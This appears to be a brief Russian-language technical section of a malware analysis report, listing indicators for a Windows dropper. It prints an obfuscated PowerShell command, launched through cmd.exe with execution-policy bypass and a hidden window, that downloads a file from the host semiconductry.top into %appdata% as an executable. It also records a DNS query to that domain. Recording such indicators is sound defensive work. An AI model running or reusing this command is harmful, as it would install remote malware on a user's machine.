Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwerSHELl.EXE -EXecutIOnPoliCY BypaSs -NoproFile -windOWSTYLE hiDDEN (nEW-objeCt sySTEm.NeT.wEbclient).doWnlOadFIlE('http://semiconductry.top/search.php','%APpdatA%.eXE');...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /C "pOwerSHELl.EXE -EXecutIOnPoliCY BypaSs -NoproFile -windOWSTYLE hiDDEN (nEW-objeCt sySTEm.NeT.wEbclient).doWnlOadFIlE('http://semiconductry.top/search.php','%APpdatA%.eXE');...' (со скрытым окном)